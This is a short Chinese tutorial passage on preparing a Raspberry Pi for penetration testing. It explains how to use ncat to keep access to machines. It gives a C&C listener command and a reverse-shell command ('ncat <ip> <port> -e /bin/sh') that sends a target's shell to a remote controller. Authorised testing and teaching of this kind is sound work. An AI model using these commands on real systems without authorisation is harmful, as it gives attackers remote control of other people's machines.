树莓派渗透测试准备指南
1. 安全连接树莓派
可以使用配置中accept参数指定的 IP 地址和端口安全连接到树莓派,这里可以借助ncat工具。
-ncat 工具:大多数版本的 Kali Linux(包括树莓派 3 的基础镜像)默认安装了ncat。ncat( https://nmap.org/ncat/guide/index.html )是一个很好的工具,可用于维持对自己机器的访问,也可在目标主机上使用,以在测试期间维持访问。双方都需要安装ncat,Linux 原生支持,Windows 和 Mac OSX 则需要从源或开源项目下载安装。
-在 C&C 节点监听:使用命令ncat -l <listening port>,其中-l后面的数字定义监听端口。
-在树莓派 3(或目标)节点监听:使用命令ncat <ip address of target> <listening port> -e /bin/sh,-e后面的选项定义使用的 shell 或要运行的命令,通常是默认 shell。 </